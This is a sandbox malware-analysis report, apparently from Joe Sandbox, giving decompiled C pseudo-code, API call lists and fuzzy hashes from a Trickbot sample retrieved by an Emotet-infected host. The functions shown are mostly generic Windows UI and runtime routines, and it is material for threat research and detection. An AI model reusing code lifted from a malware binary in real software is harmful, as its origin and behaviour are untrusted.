Instruction addresses (one per decompiled line above): 0x0040a6eb 0x0040a6ed 0x0040a6f2 0x0040a6fd 0x0040a6fe 0x0040a705 0x0040a70b 0x0040a70e 0x0040a717 0x0040a757 0x0040a75a 0x0040a783 0x00000000 0x0040a789 0x0040a78c 0x0040a78e 0x0040a793 0x0040a793 0x0040a7a3 0x0040a7ad 0x0040a7b3 0x0040a7b8 0x00000000 0x0040a7ba 0x0040a7ba 0x0040a7c7 0x0040a7cc 0x0040a7cf 0x0040a7d1 0x0040a7d7 0x0040a7ec 0x0040a7f2 0x00000000 0x0040a7f4 0x0040a803 0x0040a80b 0x00000000 0x0040a80d 0x0040a815 0x0040a815 0x0040a80b 0x0040a7f2 0x0040a7b8 0x0040a75c 0x0040a75c 0x0040a761 0x0040a763 0x0040a763 0x0040a775 0x0040a775 0x0040a719 0x0040a71c 0x0040a71f 0x0040a72f 0x0040a749 0x0040a81d 0x0040a81d 0x0040a74f 0x0040a751 0x00000000 0x0040a751 0x0040a731 0x0040a731 0x0040a752 0x0040a752 0x00000000 0x0040a752 0x0040a72f 0x0040a825 0x0040a830

                          APIs
                          • GetStringTypeW.KERNEL32(00000001,0043E9DC,00000001,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A727
                          • GetStringTypeA.KERNEL32(00000000,00000001,0043E9D8,00000001,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A741
                          • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A775
                          • MultiByteToWideChar.KERNEL32(004066EB,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A7AD
                          • MultiByteToWideChar.KERNEL32(004066EB,00000001,00000100,00000020,?,00000100,?,00000100,00000000,004066EB,00000001,00000020,00000100,?), ref: 0040A803
                          • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,004066EB,00000001,00000020,00000100,?), ref: 0040A815
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: StringType$ByteCharMultiWide
                          • String ID:
                          • API String ID: 3852931651-0
                          • Opcode ID: 832e27acd13adab07e40aa41c6bab8756545dd7dfe3adda8a3cae9fd998b57f8
                          • Instruction ID: 13a4a901a618fadbe22495cf6ae146e2136fcfdc2a1035e847f11c636613aec9
                          • Opcode Fuzzy Hash: 832e27acd13adab07e40aa41c6bab8756545dd7dfe3adda8a3cae9fd998b57f8
                          • Instruction Fuzzy Hash: 76416D76501219AFCF119F94CC89EEB3B79EB09750F148436FA01E2290D378D9619B9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00431146(intOrPtr __ecx, void* __esi) {
                          				intOrPtr _t51;
                          				void* _t53;
                          				intOrPtr _t58;
                          				signed int _t59;
                          				signed int _t77;
                          				intOrPtr _t84;
                          				intOrPtr* _t86;
                          				void* _t88;
                          				CHAR** _t90;
                          				void* _t91;
                          
                          				E00405340(E00438050, _t91);
                          				_t84 = __ecx;
                          				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
                          				_t51 = E0043127F(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
                          				if(_t51 == 0) {
                          					L19:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                          					return _t51;
                          				}
                          				_t97 =  *((intOrPtr*)(_t91 + 8));
                          				 *((intOrPtr*)(_t91 - 0x18)) = 1;
                          				if( *((intOrPtr*)(_t91 + 8)) == 0) {
                          					L18:
                          					E00431353(_t84, 1, 1);
                          					_t51 =  *((intOrPtr*)(_t91 - 0x18));
                          					goto L19;
                          				}
                          				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
                          				_push(0);
                          				_t88 = _t53;
                          				E004214F6(_t91 - 0x38, _t97);
                          				 *(_t91 - 4) = 0;
                          				 *(_t91 - 0x14) = 0;
                          				if(_t88 != 0) {
                          					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
                          				}
                          				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
                          				 *(_t91 - 0x10) = 0;
                          				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
                          					L15:
                          					if( *(_t91 - 0x14) != 0) {
                          						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
                          					}
                          					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
                          					E00421568(_t91 - 0x38,  *(_t91 - 4));
                          					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
                          					goto L18;
                          				} else {
                          					_t90 = _t86 + 0x10;
                          					do {
                          						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
                          						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                          						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
                          						_t100 = _t58;
                          						 *_t86 = _t58;
                          						if(_t58 == 0) {
                          							_t59 = GetSystemMetrics(0);
                          							asm("cdq");
                          							_t77 = 4;
                          							__eflags =  *(_t91 - 0x10);
                          							 *(_t90 - 0xc) = _t59 / _t77;
                          							if(__eflags == 0) {
                          								_t33 = _t90 - 8;
                          								 *_t33 =  *(_t90 - 8) | 0x08000100;
                          								__eflags =  *_t33;
                          							}
                          							goto L12;
                          						}
                          						if(E0041C67E(_t90, _t100, _t58) == 0) {
                          							L14:
                          							 *((intOrPtr*)(_t91 - 0x18)) = 0;
                          							goto L15;
                          						}
                          						GetTextExtentPoint32A( *(_t91 - 0x30),  *_t90,  *( *_t90 - 8), _t91 - 0x24);
                          						 *(_t90 - 0xc) =  *(_t91 - 0x24);
                          						_push(0);
                          						_push( *_t90);
                          						_push( *(_t91 - 0x10));
                          						if(E004242F7( *((intOrPtr*)(_t91 - 0x1c))) == 0) {
                          							goto L14;
                          						}
                          						L12:
                          						_t86 = _t86 + 0x14;
                          						_t90 =  &(_t90[5]);
                          						 *(_t91 - 0x10) =  *(_t91 - 0x10) + 1;
                          					} while ( *(_t91 - 0x10) <  *((intOrPtr*)(_t91 + 0xc)));
                          					goto L15;
                          				}
			}

Instruction addresses (one per decompiled line above): 0x0043114b 0x00431159 0x0043115b 0x0043115e 0x00431165 0x00431270 0x00431274 0x0043127c 0x0043127c 0x0043116e 0x00431171 0x00431178 0x00431261 0x00431267 0x0043126c 0x00000000 0x0043126f 0x00431186 0x0043118c 0x00431190 0x00431192 0x00431199 0x0043119c 0x0043119f 0x004311ab 0x004311ab 0x004311b1 0x004311b4 0x004311b7 0x00431240 0x00431244 0x0043124c 0x0043124c 0x00431252 0x00431259 0x0043125e 0x00000000 0x004311bd 0x004311bd 0x004311c0 0x004311c3 0x004311c7 0x004311c9 0x004311cd 0x004311cf 0x004311d1 0x0043120f 0x00431217 0x00431218 0x0043121b 0x0043121e 0x00431221 0x00431223 0x00431223 0x00431223 0x00431223 0x00000000 0x00431221 0x004311dd 0x0043123d 0x0043123d 0x00000000 0x0043123d 0x004311ed 0x004311f9 0x004311fe 0x004311ff 0x00431200 0x0043120a 0x00000000 0x00000000 0x0043122a 0x0043122a 0x0043122d 0x00431230 0x00431236 0x00000000 0x0043123b

                          APIs
                          • __EH_prolog.LIBCMT ref: 0043114B
                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00431186
                            • Part of subcall function 004214F6: __EH_prolog.LIBCMT ref: 004214FB
                            • Part of subcall function 004214F6: GetDC.USER32(?), ref: 00421524
                          • SelectObject.GDI32(?,00000000), ref: 004311A5
                          • GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 004311ED
                          • GetSystemMetrics.USER32(00000000), ref: 0043120F
                          • SelectObject.GDI32(?,?), ref: 0043124C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
                          • String ID:
                          • API String ID: 3673216194-0
                          • Opcode ID: d9e56b3f31b45cba375d0ff70cae1890912aad5870379dcbcaaf54e2c13effaa
                          • Instruction ID: ad8b5dff573d0eb7cf561f13d42782fbf9e12ec763b2b8bedaf0ddb995ac9046
                          • Opcode Fuzzy Hash: d9e56b3f31b45cba375d0ff70cae1890912aad5870379dcbcaaf54e2c13effaa
                          • Instruction Fuzzy Hash: EF413771A00209AFDF14DF95C8859AEFBB5FF48344F10942AE916A22A0D7789E41CF68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E0042A9BF(void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct tagMSG _v32;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t31;
                          				void* _t33;
                          				void* _t35;
                          				void* _t37;
                          				intOrPtr* _t38;
                          				void* _t42;
                          				void* _t44;
                          				intOrPtr _t55;
                          				void* _t56;
                          				void* _t57;
                          				void* _t59;
                          				void* _t60;
                          				void* _t61;
                          				intOrPtr* _t62;
                          
                          				_t58 = __edx;
                          				_t59 = GetCapture;
                          				_t60 = __ecx;
                          				if(GetCapture() != 0) {
                          					L20:
                          					return 0;
                          				}
                          				E0041884D(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                          				if(E0041884D(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                          					L19:
                          					E0042A6AF(_t60, _t72);
                          					goto L20;
                          				} else {
                          					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                          						_t31 = _v32.message - 0x100;
                          						if(_t31 == 0) {
                          							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                          							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                          								E0042A0DE(_t60, _v32.wParam, 1);
                          							}
                          							__eflags = _v32.wParam - 0x1b;
                          							if(__eflags != 0) {
                          								L18:
                          								_t33 = E0041884D(_t61, GetCapture());
                          								_t72 = _t33 -  *((intOrPtr*)(_t60 + 0x68));
                          								if(_t33 ==  *((intOrPtr*)(_t60 + 0x68))) {
                          									continue;
                          								}
                          							}
                          							goto L19;
                          						}
                          						_t35 = _t31 - 1;
                          						if(_t35 == 0) {
                          							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                          							if(__eflags != 0) {
                          								E0042A0DE(_t60, _v32.wParam, 0);
                          							}
                          							goto L18;
                          						}
                          						_t37 = _t35 - 0xff;
                          						if(_t37 == 0) {
                          							_t55 = _v32.pt;
                          							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                          							_t58 = _v8;
                          							_push(_t55);
                          							_push(_t55);
                          							_t38 = _t62;
                          							 *_t38 = _t55;
                          							 *((intOrPtr*)(_t38 + 4)) = _v8;
                          							_t56 = _t60;
                          							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                          								E0042A36A(_t56, _t59);
                          							} else {
                          								E0042A062(_t56);
                          							}
                          							goto L18;
                          						}
                          						_t42 = _t37;
                          						if(_t42 == 0) {
                          							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                          							_t57 = _t60;
                          							if(__eflags == 0) {
                          								E0042A4D2(_t61, __eflags);
                          							} else {
                          								E0042A112(_t57, _t58, _t59, _t60, __eflags);
                          							}
                          							_t44 = 1;
                          							return _t44;
                          						}
                          						if(_t42 == 0) {
                          							goto L19;
                          						}
                          						DispatchMessageA( &_v32);
                          						goto L18;
                          					}
                          					E00437058(_v32.wParam);
                          					goto L19;
                          				}
			}

Instruction addresses (one per decompiled line above): 0x0042a9bf 0x0042a9c8 0x0042a9ce 0x0042a9d4 0x0042aaae 0x00000000 0x0042aaae 0x0042a9e7 0x0042a9f7 0x0042aaa7 0x0042aaa9 0x00000000 0x0042a9fd 0x0042a9ff 0x0042aa17 0x0042aa1c 0x0042aa7c 0x0042aa82 0x0042aa8b 0x0042aa8b 0x0042aa90 0x0042aa94 0x0042aa96 0x0042aa99 0x0042aa9e 0x0042aaa1 0x00000000 0x00000000 0x0042aaa1 0x00000000 0x0042aa94 0x0042aa1e 0x0042aa1f 0x0042aa67 0x0042aa6d 0x0042aa75 0x0042aa75 0x00000000 0x0042aa6d 0x0042aa21 0x0042aa26 0x0042aa40 0x0042aa43 0x0042aa49 0x0042aa4c 0x0042aa4d 0x0042aa4e 0x0042aa50 0x0042aa52 0x0042aa55 0x0042aa57 0x0042aa60 0x0042aa59 0x0042aa59 0x0042aa59 0x00000000 0x0042aa57 0x0042aa29 0x0042aa2a 0x0042aabf 0x0042aac5 0x0042aac7 0x0042aad0 0x0042aac9 0x0042aac9 0x0042aac9 0x0042aad7 0x00000000 0x0042aad7 0x0042aa32 0x00000000 0x00000000 0x0042aa38 0x00000000 0x0042aa38 0x0042aab8 0x00000000 0x0042aab8

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Capture$Message$Dispatch
                          • String ID:
                          • API String ID: 3654672037-0
                          • Opcode ID: 4fadac2d2b6ec87a825ee8cb401d699979e30f607694b36dd129cc2155238ff3
                          • Instruction ID: 8fc101fb7659808ffcdfb29c644392aa1366e3f398272a30efadd82f301add58
                          • Opcode Fuzzy Hash: 4fadac2d2b6ec87a825ee8cb401d699979e30f607694b36dd129cc2155238ff3
                          • Instruction Fuzzy Hash: EC31D831700226DBCB21BFA9A94596F76A8EF44700FD4442FA846D2251CE7C9CA1DA6F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E00432B56(long* __ecx, signed int _a4, intOrPtr _a8) {
                          				void* _v8;
                          				void* __ebp;
                          				void* _t28;
                          				void* _t32;
                          				void* _t33;
                          				void* _t39;
                          				signed int* _t45;
                          				void* _t58;
                          				long* _t61;
                          
                          				_push(__ecx);
                          				_t61 = __ecx;
                          				_t58 = TlsGetValue( *__ecx);
                          				if(_t58 == 0) {
                          					_t28 = E0043291C(0x10);
                          					if(_t28 == 0) {
                          						_t58 = 0;
                          					} else {
                          						 *_t28 = 0x43d414;
                          						_t58 = _t28;
                          					}
                          					 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
                          					 *(_t58 + 0xc) =  *(_t58 + 0xc) & 0x00000000;
                          					_t8 = _t58 + 8; // 0x8
                          					_t45 = _t8;
                          					_t9 =  &(_t61[7]); // 0x44b4bc
                          					_v8 = _t58;
                          					EnterCriticalSection(_t9);
                          					_t11 =  &(_t61[5]); // 0x44b4b4
                          					_t48 = _t11;
                          					E004328C3(_t11, _t58);
                          					_t12 =  &(_t61[7]); // 0x44b4bc
                          					LeaveCriticalSection(_t12);
                          					goto L8;
                          				} else {
                          					_t2 = _t58 + 8; // 0x8
                          					_t45 = _t2;
                          					if(_a4 >=  *_t45 && _a8 != 0) {
                          						L8:
                          						_t32 =  *(_t58 + 0xc);
                          						if(_t32 != 0) {
                          							_t15 =  &(_t61[3]); // 0x4
                          							_t48 =  *_t15 << 2;
                          							_t33 = LocalReAlloc(_t32,  *_t15 << 2, 2);
                          						} else {
                          							_t14 =  &(_t61[3]); // 0x4
                          							_t33 = LocalAlloc(0,  *_t14 << 2);
                          						}
                          						 *(_t58 + 0xc) = _t33;
                          						if(_t33 == 0) {
                          							E0041564B(_t48);
                          						}
                          						_t17 =  &(_t61[3]); // 0x4
                          						E00405360( *(_t58 + 0xc) +  *_t45 * 4, 0,  *_t45 * 0x3fffffff +  *_t17 << 2);
                          						_t21 =  &(_t61[3]); // 0x4
                          						 *_t45 =  *_t21;
                          						TlsSetValue( *_t61, _t58);
                          					}
                          				}
                          				_t39 =  *(_t58 + 0xc);
                          				 *((intOrPtr*)(_t39 + _a4 * 4)) = _a8;
                          				return _t39;
			}

Instruction addresses (one per decompiled line above): 0x00432b59 0x00432b5c 0x00432b67 0x00432b6b 0x00432b89 0x00432b90 0x00432b9c 0x00432b92 0x00432b92 0x00432b98 0x00432b98 0x00432b9e 0x00432ba2 0x00432ba6 0x00432ba6 0x00432ba9 0x00432bad 0x00432bb0 0x00432bb7 0x00432bb7 0x00432bba 0x00432bbf 0x00432bc3 0x00000000 0x00432b6d 0x00432b70 0x00432b70 0x00432b75 0x00432bc9 0x00432bc9 0x00432bce 0x00432be1 0x00432be6 0x00432beb 0x00432bd0 0x00432bd0 0x00432bd9 0x00432bd9 0x00432bf3 0x00432bf6 0x00432bf8 0x00432bf8 0x00432c07 0x00432c17 0x00432c1c 0x00432c22 0x00432c27 0x00432c27 0x00432b75 0x00432c2d 0x00432c38 0x00432c3d

                          APIs
                          • TlsGetValue.KERNEL32(0044B4A0,0044B2EC,00000000,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432B61
                          • EnterCriticalSection.KERNEL32(0044B4BC,00000010,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BB0
                          • LeaveCriticalSection.KERNEL32(0044B4BC,00000000,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BC3
                          • LocalAlloc.KERNEL32(00000000,00000004,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BD9
                          • LocalReAlloc.KERNEL32(?,00000004,00000002,?,0044B4A0,?,00432DBE,0044B2EC,00000000,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C), ref: 00432BEB
                          • TlsSetValue.KERNEL32(0044B4A0,00000000), ref: 00432C27
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AllocCriticalLocalSectionValue$EnterLeave
                          • String ID:
                          • API String ID: 4117633390-0
                          • Opcode ID: 6f08718e99aee76a91ab9c3eee3bf652cb5089147d9f45482e0f3ba63d4090eb
                          • Instruction ID: 6a1cec24ef0a738d27fd7b160e243ed9b9806b52b958dbe0a0cbadbbd1e17570
                          • Opcode Fuzzy Hash: 6f08718e99aee76a91ab9c3eee3bf652cb5089147d9f45482e0f3ba63d4090eb
                          • Instruction Fuzzy Hash: 0E319C71100A05AFD724CF15C889FA6B7E8FB49364F00992AE81AC7650DBB4F805CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E004136F0(void* __eflags, struct HWND__* _a4, struct HDC__* _a8, struct tagRECT* _a12, signed int _a16) {
                          				CHAR* _v8;
                          				long _v12;
                          				void* _v24;
                          				long _t30;
                          				long _t36;
                          				int _t38;
                          				signed short _t40;
                          				struct HWND__* _t50;
                          				signed int _t51;
                          				signed int _t52;
                          				struct tagRECT* _t53;
                          				CHAR* _t54;
                          
                          				_t53 = _a12;
                          				PatBlt(_a8, _t53->left, _t53->top, _t53->right - _t53->left, _t53->bottom - _t53->top, 0xf00021);
                          				_t50 = _a4;
                          				_t38 = GetWindowTextLengthA(_t50);
                          				_t30 = E00405B80(_t26 + 8 & 0xfffffffc, _a8);
                          				_v8 = _t54;
                          				if(_v8 != 0) {
                          					_t30 = GetWindowTextA(_t50, _v8, _t38 + 2);
                          					if(_t30 != 0) {
                          						_t40 = 0x140;
                          						_t51 = _a16;
                          						if((_t51 & 0x0000000f) != 0xc) {
                          							_t40 = _t51 & 0x0000000f | 0x00000150;
                          						}
                          						if((_t51 & 0x00000080) != 0) {
                          							_t40 = _t40 | 0x00000008;
                          						}
                          						_t52 = _t51 & 0x08000000;
                          						if(_t52 != 0) {
                          							_t36 =  *0x44d37c; // 0x0
                          							_v12 = SetTextColor(_a8, _t36);
                          						}
                          						_t30 = DrawTextA(_a8, _v8, 0xffffffff, _t53, _t40 & 0x0000ffff);
                          						if(_t52 != 0) {
                          							_t30 = SetTextColor(_a8, _v12);
                          						}
                          					}
                          				}
                          				return _t30;
                          			}

                          APIs
                          • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00413718
                          • GetWindowTextLengthA.USER32(?), ref: 00413722
                          • GetWindowTextA.USER32(?,00000000,00000000), ref: 0041374A
                          • SetTextColor.GDI32(?,00000000), ref: 0041378B
                          • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 004137A3
                          • SetTextColor.GDI32(?,?), ref: 004137B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Text$ColorWindow$DrawLength
                          • String ID:
                          • API String ID: 1177705772-0
                          • Opcode ID: f1a971cf7509041493298ab1fa3222ab3b72bd473a12b6bd32f3dc463716aace
                          • Instruction ID: 58b5a1084d67139638d09badf21533b44d8372ff3fb946c7286e2ffb9a3225e2
                          • Opcode Fuzzy Hash: f1a971cf7509041493298ab1fa3222ab3b72bd473a12b6bd32f3dc463716aace
                          • Instruction Fuzzy Hash: 92217CB6600209AFDB10DF68DC48EFB77B9EB88321F148159FD2593390D674AE40CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E0041956C(intOrPtr* __ecx, void* __edx, void* __edi) {
                          				struct HWND__* _t33;
                          				int _t35;
                          				void* _t37;
                          				void* _t52;
                          				void* _t53;
                          				intOrPtr* _t57;
                          				void* _t58;
                          				void* _t60;
                          
                          				_t53 = __edi;
                          				_t52 = __edx;
                          				E00405340(E0043780C, _t60);
                          				_push(__ecx);
                          				_t57 = __ecx;
                          				 *((intOrPtr*)(_t60 - 0x10)) =  *((intOrPtr*)(E00432562() + 4));
                          				E00432562();
                          				E0041BB22();
                          				 *(_t60 - 4) = 0;
                          				if( *((intOrPtr*)( *_t57 + 0xb0))() != 0) {
                          					 *((intOrPtr*)( *_t57 + 0xf0))();
                          				}
                          				_push(_t53);
                          				SendMessageA( *(_t57 + 0x1c), 0x1f, 0, 0);
                          				E00419F94(_t52,  *(_t57 + 0x1c), 0x1f, 0, 0, 1, 1);
                          				_t48 = _t57;
                          				_t58 = E00419DFD(_t57);
                          				SendMessageA( *(_t58 + 0x1c), 0x1f, 0, 0);
                          				E00419F94(_t52,  *(_t58 + 0x1c), 0x1f, 0, 0, 1, 1);
                          				_t33 = GetCapture();
                          				if(_t33 != 0) {
                          					SendMessageA(_t33, 0x1f, 0, 0);
                          				}
                          				_t35 = WinHelpA( *(_t58 + 0x1c),  *( *((intOrPtr*)(_t60 - 0x10)) + 0x8c),  *(_t60 + 0xc),  *(_t60 + 8));
                          				_t65 = _t35;
                          				if(_t35 == 0) {
                          					_push(0xffffffff);
                          					_push(0);
                          					_push(0xf107);
                          					E00428683(_t48, _t65);
                          				}
                          				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
                          				E00432562();
                          				_t37 = E0041BB37();
                          				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
                          				return _t37;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 00419571
                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004195BE
                          • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004195E0
                          • GetCapture.USER32 ref: 004195F2
                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00419601
                          • WinHelpA.USER32(?,?,?,?), ref: 00419615
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSend$CaptureH_prologHelp
                          • String ID:
                          • API String ID: 432264411-0
                          • Opcode ID: adc22d459c4f50ed27d5a56bd9e839dbce410aa24dfb8b2812f160b3992fdd90
                          • Instruction ID: c50fd0a47b97c02ea19ea16424d869409c254042698b9381e294f1ad428140f2
                          • Opcode Fuzzy Hash: adc22d459c4f50ed27d5a56bd9e839dbce410aa24dfb8b2812f160b3992fdd90
                          • Instruction Fuzzy Hash: 66219271200209BFEB21AF61DC89FAA77A9EF08754F14852DF141971E2CBB49D409B24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042FB10(intOrPtr _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16, struct HBRUSH__* _a20) {
                          				struct tagRECT _v20;
                          				struct HBRUSH__* _t46;
                          				long _t50;
                          				struct HBRUSH__* _t52;
                          				intOrPtr _t59;
                          				struct HBRUSH__* _t60;
                          				long _t64;
                          				struct HBRUSH__* _t66;
                          				intOrPtr _t70;
                          				intOrPtr _t72;
                          
                          				CopyRect( &_v20, _a8);
                          				_v20.right = _v20.left + _a12;
                          				_t46 = _a20;
                          				if(_t46 != 0) {
                          					_t46 =  *(_t46 + 4);
                          				}
                          				_t72 = _a4;
                          				FillRect( *(_t72 + 4),  &_v20, _t46);
                          				_t50 = _a8->right;
                          				_v20.right = _t50;
                          				_v20.left = _t50 - _a12;
                          				_t52 = _a20;
                          				if(_t52 != 0) {
                          					_t52 =  *(_t52 + 4);
                          				}
                          				FillRect( *(_t72 + 4),  &_v20, _t52);
                          				CopyRect( &_v20, _a8);
                          				_t70 = _a16;
                          				_v20.bottom = _v20.top + _t70;
                          				_t59 = _a12;
                          				_v20.left = _v20.left + _t59;
                          				_v20.right = _v20.right - _t59;
                          				_t60 = _a20;
                          				if(_t60 != 0) {
                          					_t60 =  *(_t60 + 4);
                          				}
                          				FillRect( *(_t72 + 4),  &_v20, _t60);
                          				_t64 = _a8->bottom;
                          				_v20.bottom = _t64;
                          				_v20.top = _t64 - _t70;
                          				_t66 = _a20;
                          				if(_t66 != 0) {
                          					_t66 =  *(_t66 + 4);
                          				}
                          				return FillRect( *(_t72 + 4),  &_v20, _t66);
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Fill$Copy
                          • String ID:
                          • API String ID: 4194453840-0
                          • Opcode ID: 445d6d768625bd53249d3c69998b48563eb8e11fbc0dc3396b2e7305795024a1
                          • Instruction ID: f8f4c66fb0c108c53764a6bd85a7439a7e8a00f3560e574e77d4b8bfe7b19bff
                          • Opcode Fuzzy Hash: 445d6d768625bd53249d3c69998b48563eb8e11fbc0dc3396b2e7305795024a1
                          • Instruction Fuzzy Hash: 5D3196B5A0011AAFCF00CFA9DD85DAEBBF8FF08254B448566B918D7211D730E914DBA4
                          Uniqueness

